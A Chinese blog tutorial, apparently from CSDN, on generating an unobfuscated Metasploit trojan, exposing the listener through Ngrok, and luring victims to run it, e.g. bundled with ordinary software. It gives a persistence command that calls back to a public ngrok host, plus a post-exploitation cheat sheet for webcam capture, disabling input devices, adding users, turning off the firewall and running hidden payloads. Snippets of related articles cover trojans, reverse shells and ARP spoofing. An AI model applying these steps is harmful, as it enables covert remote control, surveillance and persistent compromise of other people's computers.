Kali Linux 木马 内网穿透 保姆级教学

最新推荐文章于 2025-03-12 19:50:49 发布
最新推荐文章于 2025-03-12 19:50:49 发布
阅读量1.5k 收藏 27
点赞数 7
文章标签: linux 运维 服务器 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_73135216/article/details/139546307
版权

前言:在我的文章最早第一篇就发布了,但是当时用的是国内的飞鸽内网穿透,现在不仅仅要实名认证,而且免费的也没有了,部署和修改也比较麻烦。在这里我再推荐一个更好用的内网穿透,上手简单,而且完全免费也相对比较稳定可靠,就是大名鼎鼎的 Ngrok

https://dashboard.ngrok.com/icon-default.png?t=N7T8https://dashboard.ngrok.com/

 任务一  注册账号,(QQ邮箱不行!,我的GitHub账号由qq邮箱注册都无法授权)

任务二  如果遇到了一点问题请科学上网 咳咳嗯力挺非常good 魔戒.net 

任务三 这里选择Linux的,再去下载

任务四 下载完以后,将压缩包放到kali里面,解压。会得到ngrok文件

tar -xvzf ngrok-v3-stable-linux-amd64.tgz

任务五 配置文件 回到APT,会发现下面有 密钥,复制

任务六 配置 ,在kali里面输入进去,在执行的时候记得加上 "./",出现了下面这个就是成功了.

任务七  连接服务器,进行内网穿透,本地监听端口

任务八 生成msf木马(未免杀) ,注意自己端口和地址

任务九 利用msf,使用以下模块 ,我这里监听端口是2024,是因为我左上角设置2024!!!

任务十 在Windows运行(在现实中,你要诱导受害者点击,比如捆绑正常软件.....等)

任务十一  添加持久性木马(后渗透),当你再次使用模块监听时,会自动连接

run persistence -X -i 3 -r [公网服务器名称 0.tcp.jp.ngrok.io] -p [公网端口]
-X                 //开机自启动
-i                 //回连的时间间隔 (-i 3 代表每3秒钟连接我们一次)
-r                 //目标机器 IP 地址(攻击主机)
-p                 //监听反向连接端口号

 

任务十二 kali后渗透命令 

 

基础命令
shell         #进入目标机cmd shell
background    #将当前会话放置后台
sessions      #sessions -h 查看帮助
sessions -i <ID值>  #进入会话   -k  杀死会话
bgrun / run   #执行已有的模块,输入run后按两下tab,列出已有的脚本
info      #查看已有模块信息
getuid    #查看当前用户身份
getprivs  #查看当前用户具备的权限
getpid    #获取当前进程ID(PID)
sysinfo   #查看目标机系统信息
irb   #开启ruby终端
ps    #查看正在运行的进程    
kill <PID值> #杀死指定PID进程
idletime     #查看目标机闲置时间
reboot / shutdown    #重启/关机
 
cmd命令
whoami     #当前权限
quser      #当前在线的管理员
net user   #存在用户
net user 用户名 密码 /add            #添加用户和对应密码
net localgroup 用户组名 用户名 /add  #将指定用户添加到指定用户组
netstat -ano  #查询当前计算机中网络连接通信情况,LISTENING表示该端口处于监听状态;ESTABLISHED表示该端口处于工作(通信)状态
systeminfo     #查看当前计算机中的详细情况
tasklist /svc  #查看每个进程所对应的服务
taskkill /f /im 程序名称    #结束某个指定名称的程序
taskkill /f /PID ID        #结束某个指定PID的进程
tasklist | findstr "字符串" #查找输出结果中指定的内容
netsh adcfirewall set allprofiles state off  #关闭防火墙
logoff        #注销某个指定用户的ID
shutdown -r   #重启当前计算机

 

​​​​​​​webcam摄像头命令
webcam_list     #查看摄像头
webcam_snap     #通过摄像头拍照
webcam_stream   #通过摄像头开启视频
uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标
uictl disable mouse     #禁用鼠标
uictl disable keyboard  #禁用键盘
execute执行文件
execute   #在目标机中执行文件
execute -H -i -f  cmd.exe   #创建新进程cmd.exe,-H不可见,-i交互
execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt"
  #-d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行
  #"-o hack.txt"是payload.exe的运行参数

 这几段是从别的文章复制过来的,有兴趣就去看

【kali-漏洞利用】(3.3)后渗透之Meterpreter(上):命令大全_kali的meterpreter查看摄像头命令-优快云博客

 任务十三 收工

 

 

如何在Kali linux简单内网穿透
Sunspot
03-27 1744
注意:将替换为您想要绑定到本地的端口号,和替换为您要访问的内部服务器的IP地址和端口号,和替换为您远程服务器的用户名和IP地址。在公网服务器上运行服务端软件,将其配置为监听指定端口。这将在公网服务器上创建一个反向SSH隧道,将公网服务器的指定端口转发到内网机器的SSH端口上。这将在公网服务器上创建一个反向SSH隧道,将公网服务器的指定端口转发到内网机器的SSH端口上。
kali linux内网穿透(内网上线)
边城浪子的博客
08-09 1万+
windsow下内网上线很简单,也比较容易理解,换做kali linux也是一样的,下面介绍花生壳内网穿透,以此来记录自己的成长历程。 实验环境: 虚拟机,kali linux 2.0,phddns_3.0_x86_64.deb(花生壳linux安装包) 1.在虚拟机中启动kali linux 2.0,安装phddns_3.0_x86_64.deb step1:在花生壳官网下载软件...
内网穿透--Nps-自定义-上线
金灰的博客
05-25 1445
免责声明:本文仅做技术交流与学习...
使用Kali Linux系统生成木马病毒并实现远程控制计算机
最新发布
qq_44005305的博客
03-12 1014
生成木马病毒并实现远程控制计算机木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码通常有控制端和被控制端两个可执行程序。它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种者电脑的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至还可以远程操控被种者的电脑。我将会详细的介绍使用Kali Linux系统生成木马,并用它远程控制一台处在外网的物理计算机。安装虚拟机和系统开通隧道生成木马加壳免杀远程控制安装虚拟机和系统。
kali-frp内网穿透
乌托托的博客
12-24 1846
什么是内网穿透?内网,就是在公司或者家庭内部,建立的局域网络或者是办公网络,可以实现多台电脑之间的资源共享,包括设备、资料、数据等。而外网则是通过一个网关与其它的网络系统连接,相对于内网而言,这种网络系统称之为外部网络,常见的就是我们日常使用的互联网。一般而言,在没有固定公网IP的情况下,外网设备无法直接访问内网设备。而内网穿透技术,顾名思义就是能让外网的设备找到处于内网的设备,从而实现数据通信。内网穿透的原理内网穿透,又称为NAT穿透。
Qt下载安装及配置教程(非常详细),从零基础入门到精通,看完这一篇就够了
Innocence_0的博客
08-19 4904
下载开源版往下滑,下载Qt在线安装程序它已经检测出我的是windows系统,直接点击download就好。如果是其它的系统,需要找到对应自己系统的安装包。然后跟网速有关,等一会就会自动下载等待下载完成,双击.exe文件,就可以进行安装。首先就是登录qt账户,如果没有可以自行注册一个。然后选择个人用户,之后点击下一步进行安装。如果没有报错,那继续往下:这一步是问你对qt有什么改善的建议,我这里直接选择没有,然后继续进行下一步。
[Kali Linux]入门:内网穿透的教程和实战(很适合入门|附图)
MSB_WLAQ的博客
10-07 5569
hello 各位freebuf的铁铁,我是白面安全猿,我又来发表文章了。因为最近有好多网友问我关于内网穿透的事情,所以打算写一篇教程尽量教会各位刚入门kali的新手和没有具体了解过内网穿透的老手内网穿透! 我这个人也不喜欢搞什么花里胡少的东西,原理我就不多说了,说了新手理解起来比较吃力,都是从那一步来的都知道。如果想要具体去了解内网穿透原理的话可以去看看其他博主的文章。 首先想要内网穿透的话必须先要用到内网穿透的工具,很多第三方都提供了内网穿透的工具,比如花生壳啊或者飞鸽啊等等,那么我这里推荐一下sun
Android Termux 安装Kali Linuxkali Nethunter史诗详细教程
热门推荐
风云小虾米的博客
12-02 6万+
Termux 安装kali
即昨天之后今天搞kali使用natapp内网穿透
qq_45873689的博客
07-28 1371
开门见山不水 开局就是注册natapp 然后实名制获取免费资格 然后免费用通道 获得 下的参数 我是直接用windows系统在natapp官网客户端下载的liunx64位 同时记住你的版本号一会有用 下载好了直接传给kali虚拟机剪切到主目录里面就行了 然后打开kali终端输入 ls 查看到了,然后打开 输入 ls natapp 输入命令 ./natapp-authtoken=********ab89 (这个等于号后面的就是前面免费隧道里面的authtoke...
内网穿透kali linux,frp
weixin_29491259的博客
05-15 922
##前言kali不能总是在虚拟机里放着,要放出去溜溜的。##前期准备首先要有一台服务器,我用的Vultr的服务器,最近搞活动,充值十美元,赠送50美元,很划算。网上有很多购买的教程,我这里就不演示了。安装Centos 7就可以。##开始穿透##服务端wget https://github.com/fatedier/frp/releases/download/v0.30.0/frp_0.30.0_l...
kali渗透内网和外网
xnxqwzy的博客
08-22 1355
第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”lhost:设置kali的IPlport:设置端口(要与下面的setlport保持一致)-f:文件的类型为exe类型-o:生成payload,名为payload.exe,保存在kali的/root目录下第二步:将生成的木马文件发送到对方电脑我们启动kalimsfconsole 进入msfconsole。
本地Kali系统开启SSH服务并使用内网穿透生成公网地址实现ssh远程连接
m0_69984273的博客
07-12 3250
本文主要介绍如何在本地Kali Linux系统启动ssh服务,并结合cpolar内网穿透软件生成公网地址,轻松实现无公网IP环境也能随时ssh远程连接Kali系统。
kali内网渗透小技巧
m0_55017965的博客
03-29 3247
基础知识点: 重点:让kali和其他电脑连接在同一个内网上 arpspoof:arp断网攻击 1.ifconfig输入,观察自己Kali的内网IP 2.查询与自己kali处于一个内网的IP:fping -asg +ip地址 3.攻击任何一台属于内网的主机 4.arpspoof -i eth0 -t ip地址 目标网关(可以自己计算) 另外,还可以进行目标监听,知道对方在访问什么图片,网址,一切归功于arp协议的漏洞。 ...
项目笔记:Kali使用Ngrok进行内网穿透
basicsffds的博客
01-15 638
内网穿透,也被称为NAT(网络地址转换)穿透或内网映射,是一种将本地网络服务暴露给互联网的技术。简单来说,就是让处于局域网(内网)内的设备能够通过互联网进行通信,实现远程访问和操作。原理如下端口映射:在路由器别进行配置,将外部端口的请求转发到内网设备上的特定端口。反向代理:使用反向代理服务器接收外部请求,并将其转发到内网服务上。VPN:在网络中创建一个加密的“隧道”,允许远程设备安全地访问内网资源。
kali 安装cpolar内网穿透实现 ssh 远程连接
小吉妙妙屋
09-05 2627
简单几步通过cpolar 内网穿透软件实现ssh 远程连接kali!
frp内网穿透—将kali代理在公网中进行渗透测试
monster663的博客
09-10 7329
frp内网穿透,通过frp将kali虚拟机端口映射到公网IP端口上,更好的解决利用kali对公网IP展开测试的问题
内网kali 通过ngrok穿透反弹shell
失心少年
08-05 8543
1、在ngrok注册账号,并且开通免费隧道(网址:https://www.ngrok.cc) 这里我kali的内网ip地址是10.10.10.131 2、.下载Ngrok客户端 (地址https://www.ngrok.cc/download.html) 解压后上传至kali 或者传到kali后unzip 命令进行解压 得到一个sunny文件 3...
内网穿透之运行木马程序
CP1024的博客
10-04 721
步骤: 1.自己必须要能运行CS,并且在内网自己可以实现运行木马 2.两个内网之间: 简单步骤: 公网图片 本机图片: CS图片: 木马在win7图片: 这只是简单的步骤,如果实现不懂,可以在下方评论,我可以给你解答。 ...
kali安装内网穿透工具并实现ssh远程连接
小小小智_x0__0x_的博客
11-27 5173
简单几步通过[cpolar 内网穿透]()软件实现ssh远程连接kali
kali设置ngrok内网穿透教程
01-10
### Kali Linux 上设置 Ngrok 进行内网穿透 #### 安装 Ngrok 客户端 为了在 Kali Linux 中使用 Ngrok 实现内网穿透,需先下载并安装 Ngrok 的客户端。访问官方网站 https://ngrok.com/ 或者国内镜像站点获取最新版的 Ngrok 下载链接[^2]。 #### 注册账户与认证 前往 Ngrok 官方网站注册账号,推荐通过 GitHub 账号直接登录以规避可能遇到的验证码问题。完成注册后,在个人页面找到 Authtoken 并保存下来;此令牌用于激活本地计算机上的 Ngrok 服务。 ```bash ./ngrok authtoken your_auth_token_here ``` 上述命令中的 `your_auth_token_here` 需替换为实际获得的授权码字符串。 #### 启动隧道服务 成功绑定账号后即可创建新的隧道连接。假设要暴露本地运行的一个 HTTP Web 应用程序,则可执行如下指令: ```bash ./ngrok http 80 ``` 这条语句表示将本机第 80 号端口映射至互联网上随机分配的一个公共 URL 地址下[^4]。 对于更复杂的场景如远程桌面共享或是其他 TCP 协议支持的服务,也可以指定不同的参数来满足需求。例如建立 SSH 访问通道: ```bash ./ngrok tcp 22 ``` 这会把本地 SSH 服务开放出去供外部网络接入。 #### 设置持久化连接 (可选) 如果希望构建更加稳定可靠的长期在线环境,考虑利用 Crontab 或 Systemd 等机制确保 Ngrok 进程始终处于活动状态。另外还可以借助特定脚本来定期重启或监控其工作状况[^3]。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

淡水猫.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值